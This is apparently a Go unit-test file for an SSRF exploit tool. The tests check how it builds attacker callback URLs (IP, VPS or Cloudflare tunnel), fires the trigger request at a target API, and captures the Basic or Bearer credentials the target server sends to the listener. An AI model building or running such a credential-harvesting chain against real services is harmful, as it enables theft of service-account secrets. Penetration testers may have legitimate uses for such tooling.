README.md
Rendering markdown...
package main
import (
"context"
"encoding/base64"
"io"
"net/http"
"net/http/httptest"
"strings"
"testing"
"time"
)
// encodeBasic returns a Basic Authorization header value for the given credentials.
func encodeBasic(s string) string {
return "Basic " + base64.StdEncoding.EncodeToString([]byte(s))
}
// -- buildCallbackURL ---------------------------------------------------------
func TestBuildCallbackURL(t *testing.T) {
tests := []struct {
name string
host string
port string
want string
}{
{
name: "bare IP - port appended",
host: "192.168.1.10",
port: "9090",
want: "http://192.168.1.10:9090" + ssrfPath,
},
{
name: "bare IP with different port - correct port appended",
host: "192.168.1.10",
port: "7777",
want: "http://192.168.1.10:7777" + ssrfPath,
},
{
name: "bare hostname - port appended",
host: "myhost.local",
port: "9090",
want: "http://myhost.local:9090" + ssrfPath,
},
{
name: "http IP no port - port appended",
host: "http://192.168.1.10",
port: "9090",
want: "http://192.168.1.10:9090" + ssrfPath,
},
{
name: "http IP with explicit port - used as-is",
host: "http://192.168.1.10:9090",
port: "9090",
want: "http://192.168.1.10:9090" + ssrfPath,
},
{
name: "http IP with different explicit port - listener port ignored",
host: "http://192.168.1.10:8888",
port: "9090",
want: "http://192.168.1.10:8888" + ssrfPath,
},
{
name: "http IP with explicit port and trailing slash - slash stripped",
host: "http://192.168.1.10:8888/",
port: "9090",
want: "http://192.168.1.10:8888" + ssrfPath,
},
{
name: "https tunnel hostname - no port appended",
host: "https://random-words.trycloudflare.com",
port: "9090",
want: "https://random-words.trycloudflare.com" + ssrfPath,
},
{
name: "https tunnel hostname with trailing slash - slash stripped",
host: "https://random-words.trycloudflare.com/",
port: "9090",
want: "https://random-words.trycloudflare.com" + ssrfPath,
},
{
name: "http IP with trailing slash - slash stripped and port appended",
host: "http://192.168.1.10/",
port: "9090",
want: "http://192.168.1.10:9090" + ssrfPath,
},
{
name: "http VPS hostname no explicit port - port appended",
host: "http://vps.example.com",
port: "9090",
want: "http://vps.example.com:9090" + ssrfPath,
},
{
name: "http VPS hostname with explicit port - used as-is",
host: "http://vps.example.com:9090",
port: "9090",
want: "http://vps.example.com:9090" + ssrfPath,
},
{
name: "http IPv6 no port - brackets preserved and port appended",
host: "http://[::1]",
port: "9090",
want: "http://[::1]:9090" + ssrfPath,
},
{
name: "bare IPv6 no brackets - brackets added and port appended",
host: "::1",
port: "9090",
want: "http://[::1]:9090" + ssrfPath,
},
{
name: "bare IPv6 with brackets - brackets preserved and port appended",
host: "[::1]",
port: "9090",
want: "http://[::1]:9090" + ssrfPath,
},
{
name: "https IP no port - treated as tunnel, no port appended",
host: "https://192.168.1.10",
port: "9090",
want: "https://192.168.1.10" + ssrfPath,
},
{
name: "http IPv6 with explicit port - used as-is",
host: "http://[::1]:9090",
port: "9090",
want: "http://[::1]:9090" + ssrfPath,
},
{
name: "https IPv6 no port - treated as tunnel, no port appended",
host: "https://[::1]",
port: "9090",
want: "https://[::1]" + ssrfPath,
},
{
name: "https IPv6 with explicit port - used as-is",
host: "https://[::1]:443",
port: "9090",
want: "https://[::1]:443" + ssrfPath,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := buildCallbackURL(tt.host, tt.port)
if got != tt.want {
t.Errorf("buildCallbackURL(%q, %q)\n got %s\n want %s", tt.host, tt.port, got, tt.want)
}
})
}
}
// -- decodeAuth ---------------------------------------------------------------
func TestDecodeAuth(t *testing.T) {
tests := []struct {
name string
header string
want string
}{
{
name: "empty header",
header: "",
want: "",
},
{
name: "valid Basic auth",
header: encodeBasic("testuser:testpassword"),
want: "testuser:testpassword",
},
{
name: "colon in password",
header: encodeBasic("user:p@ss:w0rd"),
want: "user:p@ss:w0rd",
},
{
name: "non-Basic scheme returned as-is",
header: "Bearer some-token",
want: "Bearer some-token",
},
{
name: "invalid base64 returns empty string",
header: "Basic !!!not-valid-base64!!!",
want: "",
},
{
name: "Basic with empty payload - decodes to empty string",
header: "Basic ",
want: "",
},
{
name: "lowercase basic scheme returned as-is",
header: "basic dXNlcjpwYXNz",
want: "basic dXNlcjpwYXNz",
},
{
name: "unpadded base64 - decoded despite missing padding",
header: "Basic YWI6Y2Q", // "ab:cd" without trailing =
want: "ab:cd",
},
{
name: "trailing whitespace in payload - still decoded",
header: "Basic dXNlcjpwYXNz ", // "user:pass" with trailing space
want: "user:pass",
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := decodeAuth(tt.header)
if got != tt.want {
t.Errorf("decodeAuth(%q)\n got %q\n want %q", tt.header, got, tt.want)
}
})
}
}
// -- callbackHandler ----------------------------------------------------------
func TestCallbackHandler(t *testing.T) {
tests := []struct {
name string
path string
auth string
verbose bool
body string
wantCode int
wantCreds string // empty means done should not receive a value
prefillDone string // if non-empty, pre-fill done channel before handling
}{
{
name: "wrong path - 404 and done untouched",
path: "/not-the-ssrf-path",
wantCode: http.StatusNotFound,
},
{
name: "wrong path with verbose - headers consumed but 404 and done untouched",
path: "/not-the-ssrf-path",
verbose: true,
body: "some body",
wantCode: http.StatusNotFound,
},
{
name: "correct path with no auth - 200 and done untouched",
path: ssrfPath,
wantCode: http.StatusOK,
},
{
name: "correct path with Bearer token - raw header captured",
path: ssrfPath,
auth: "Bearer some-token",
wantCode: http.StatusOK,
wantCreds: "Bearer some-token",
},
{
name: "correct path with invalid base64 - 200 and done untouched",
path: ssrfPath,
auth: "Basic !!!invalid!!!",
wantCode: http.StatusOK,
},
{
name: "correct path with valid Basic auth - decoded credentials captured",
path: ssrfPath,
auth: encodeBasic("admin:hunter2"),
wantCode: http.StatusOK,
wantCreds: "admin:hunter2",
},
{
name: "verbose mode with body - credentials captured and body printed",
path: ssrfPath,
auth: encodeBasic("user:pass"),
verbose: true,
body: "some request body",
wantCode: http.StatusOK,
wantCreds: "user:pass",
},
{
name: "verbose mode with no body - body print suppressed",
path: ssrfPath,
auth: encodeBasic("user:pass"),
verbose: true,
wantCode: http.StatusOK,
wantCreds: "user:pass",
},
{
name: "duplicate callback - channel full, credentials discarded",
path: ssrfPath,
auth: encodeBasic("second:creds"),
wantCode: http.StatusOK,
prefillDone: "first:creds",
wantCreds: "first:creds", // channel holds the original, not the duplicate
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
done := make(chan string, 1)
if tt.prefillDone != "" {
done <- tt.prefillDone
}
req := httptest.NewRequest("GET", tt.path, strings.NewReader(tt.body))
if tt.auth != "" {
req.Header.Set("Authorization", tt.auth)
}
rr := httptest.NewRecorder()
callbackHandler(tt.verbose, done)(rr, req)
if rr.Code != tt.wantCode {
t.Errorf("status: got %d, want %d", rr.Code, tt.wantCode)
}
if tt.wantCreds != "" {
select {
case got := <-done:
if got != tt.wantCreds {
t.Errorf("creds: got %q, want %q", got, tt.wantCreds)
}
default:
t.Errorf("expected %q in done channel, got nothing", tt.wantCreds)
}
} else {
select {
case got := <-done:
t.Errorf("done should be empty, got %q", got)
default:
}
}
})
}
}
// -- fireTrigger --------------------------------------------------------------
func TestFireTrigger(t *testing.T) {
var gotPath, gotQ string
ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
gotPath = r.URL.Path
gotQ = r.URL.Query().Get("q")
w.WriteHeader(http.StatusOK)
}))
defer ts.Close()
status, err := fireTrigger(ts.URL, "192.168.1.10", "9090")
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if status != http.StatusOK {
t.Errorf("status: got %d, want %d", status, http.StatusOK)
}
if gotPath != apiPath {
t.Errorf("path: got %s, want %s", gotPath, apiPath)
}
wantQ := "http://192.168.1.10:9090" + ssrfPath
if gotQ != wantQ {
t.Errorf("q param:\n got %s\n want %s", gotQ, wantQ)
}
}
func TestFireTriggerTrailingSlashOnTarget(t *testing.T) {
var gotPath, gotQ string
ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
gotPath = r.URL.Path
gotQ = r.URL.Query().Get("q")
w.WriteHeader(http.StatusOK)
}))
defer ts.Close()
_, err := fireTrigger(ts.URL+"/", "192.168.1.10", "9090")
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if gotPath != apiPath {
t.Errorf("path: got %s, want %s", gotPath, apiPath)
}
wantQ := "http://192.168.1.10:9090" + ssrfPath
if gotQ != wantQ {
t.Errorf("q param:\n got %s\n want %s", gotQ, wantQ)
}
}
func TestFireTriggerNonOKStatus(t *testing.T) {
ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
w.WriteHeader(http.StatusInternalServerError)
}))
defer ts.Close()
status, err := fireTrigger(ts.URL, "192.168.1.10", "9090")
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if status != http.StatusInternalServerError {
t.Errorf("status: got %d, want %d", status, http.StatusInternalServerError)
}
}
func TestFireTriggerConnectionRefused(t *testing.T) {
_, err := fireTrigger("http://127.0.0.1:1", "192.168.1.10", "9090")
if err == nil {
t.Error("expected error for connection refused, got nil")
}
}
// -- callback chain (integration) ---------------------------------------------
func TestCallbackChain(t *testing.T) {
done := make(chan string, 1)
ln, server, err := startListener("0", false, done)
if err != nil {
t.Fatalf("startListener failed: %v", err)
}
defer server.Shutdown(context.Background())
go func() {
if err := server.Serve(ln); err != nil && err != http.ErrServerClosed {
t.Errorf("server error: %v", err)
}
}()
creds := "service-account:secret-password"
req, err := http.NewRequest("GET", "http://"+ln.Addr().String()+ssrfPath, nil)
if err != nil {
t.Fatalf("NewRequest: %v", err)
}
req.Header.Set("Authorization", encodeBasic(creds))
resp, err := http.DefaultClient.Do(req)
if err != nil {
t.Fatalf("callback request failed: %v", err)
}
io.Copy(io.Discard, resp.Body) //nolint:errcheck
resp.Body.Close()
select {
case got := <-done:
if got != creds {
t.Errorf("credentials: got %q, want %q", got, creds)
}
case <-time.After(2 * time.Second):
t.Error("timed out waiting for callback")
}
}
func TestCallbackChainDuplicateDiscarded(t *testing.T) {
done := make(chan string, 1)
ln, server, err := startListener("0", false, done)
if err != nil {
t.Fatalf("startListener failed: %v", err)
}
defer server.Shutdown(context.Background())
go func() {
if err := server.Serve(ln); err != nil && err != http.ErrServerClosed {
t.Errorf("server error: %v", err)
}
}()
send := func(creds string) {
req, err := http.NewRequest("GET", "http://"+ln.Addr().String()+ssrfPath, nil)
if err != nil {
t.Fatalf("NewRequest: %v", err)
}
req.Header.Set("Authorization", encodeBasic(creds))
resp, err := http.DefaultClient.Do(req)
if err != nil {
t.Fatalf("request failed: %v", err)
}
io.Copy(io.Discard, resp.Body) //nolint:errcheck
resp.Body.Close()
}
send("first:creds")
send("second:creds") // should be silently discarded
select {
case got := <-done:
if got != "first:creds" {
t.Errorf("expected first:creds, got %q", got)
}
case <-time.After(2 * time.Second):
t.Error("timed out waiting for callback")
}
// Channel should now be empty - second callback was discarded
select {
case extra := <-done:
t.Errorf("second callback leaked into channel: %q", extra)
default:
}
}